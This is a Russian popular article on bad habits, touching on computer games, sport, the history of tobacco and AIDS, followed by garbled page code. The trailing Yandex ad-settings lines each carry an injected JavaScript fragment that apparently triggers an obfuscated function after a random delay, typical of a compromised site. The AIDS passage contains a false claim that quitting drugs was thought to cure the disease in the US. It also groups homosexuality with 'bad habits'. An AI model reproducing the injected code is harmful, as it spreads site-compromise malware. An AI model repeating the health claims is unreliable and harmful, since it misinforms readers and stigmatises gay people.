Интересные факты о курении, компьютерах, футболе и СПИДе

Нет такого человека, у которого бы не было вредных привычек, только люди различаются на тех, кто может с ними справиться и контролировать, и тех, кто остался под их властью. Общественное мнение многие эти привычки считает неприемлемыми.

Знаете ли вы, что вопрос, откуда берутся вредные привычки – это вопрос на который нету ответа. Вредная привычка – это действие, которое человек повторяет снова и снова, и не всегда на первый взгляд безобидное действие может быть безвредным. То, что ребенок выучил стихотворение и рассказывает его, никаким образом не может таить в себе вреда, но если он начинает повторять его снова и снова, то окружающим это вряд ли понравится. Существуют некоторые интересные факты о футболе и обо всем спорте, в которых рассказывается, что вредные привычки не дают добиться желаемого результата и стать лучше. Также существует мнение, что спорт и вредные привычки вообще несовместимы, и только тогда вы сможете чего-то добиться, когда избавитесь от них.

Еще есть интересные факты о компьютерах, компьютерных играх и программах. В последнее время вредные привычки молодежи связаны именно с ними. Компьютерные игры и программы имеют достаточно большую популярность и увлечения какой-либо игрой часто приобретают характер вредной привычки. Наверное, нет такого человека, который бы не играл в самые известные игры от производителя ОС Windows (карточные игры), у многих людей, работающих на компьютере, уже выработалась привычка отдавать все свое время этим играм без всякого смысла, даже в ущерб рабочему времени. Когда-то, когда не было пасьянсов, вредной привычкой можно было считать разгадывание кроссвордов, многие, отвечая на прикольные вопросы и ответы уделяли этому занятию столько времени, что забывали обо всем вокруг.
Часто у молодых людей привычка играть в он-лайн игры приобретает серьезную зависимость, что может перерасти в болезнь и сильно навредить организму и психике, хотя считается, что умеренное занятие такими играми только стимулирует мозговую активность и увеличивает умственный потенциал.

В истории есть очень интересные факты о курении: когда-то в Европе это не считали вредной привычкой, и курение табака назначалось врачами от многих недугов, более того – самому табаку приписывали целебные свойства в любом его применении. Но в то же самое время в России запрещалось любое применение и выращивание табака под страхом жестокого наказания. На сегодняшний день уже доказано, что при употреблении продуктов из табака появляется большая вероятность заболеть смертельными болезнями.

Есть такие же интересные факты о СПИДе, долгое время считалось, что это заболевание напрямую связано с вредными привычками: в основном, с наркоманией и гомосексуализмом. В США считалось, что человек, избавившийся от наркотической зависимости, избавлялся и от этого серьезного заболевания, хотя в России существовало совершенно противоположное мнение – считали, что “Заболевание остается неизлечимым и приводит к неотвратимо смертельному исходу…”.

Психологи приводят очень интересные факты о человеке и его привычках, они считают, что привычки, как вредные, так и не очень, могут многое рассказать о характере человека, о нюансах его поведения среди других людей. Считается, что наши привычки позволяют вести себя более раскованно и свободно, люди, таким образом, внушают себе более хорошее самочувствие и уверенность в себе, и становятся более успешными.


andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andex_partner_id = 63203;
yandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andex_site_bg_color = ‘FFFFFF’;
yandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andex_site_charset = ‘utf-8’;
yandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andex_ad_format = ‘direct’;
yandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andex_font_size = 1;
yandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andex_direct_type = ‘horizontal’;
yandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andex_direct_border_type = ‘block’;
yandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andex_direct_limit = 3;
yandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andex_direct_header_bg_color = ‘FEEAC7’;
yandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andex_direct_border_color = ‘FBE5C0’;
yandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andex_direct_title_color = ‘0000CC’;
yandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andex_direct_url_color = ‘006600’;
yandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andex_direct_all_color = ‘0000CC’;
yandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andex_direct_text_color = ‘000000’;
yandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andex_direct_hover_color = ‘0066FF’;
yandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andex_direct_favicon = true;
document.write(‘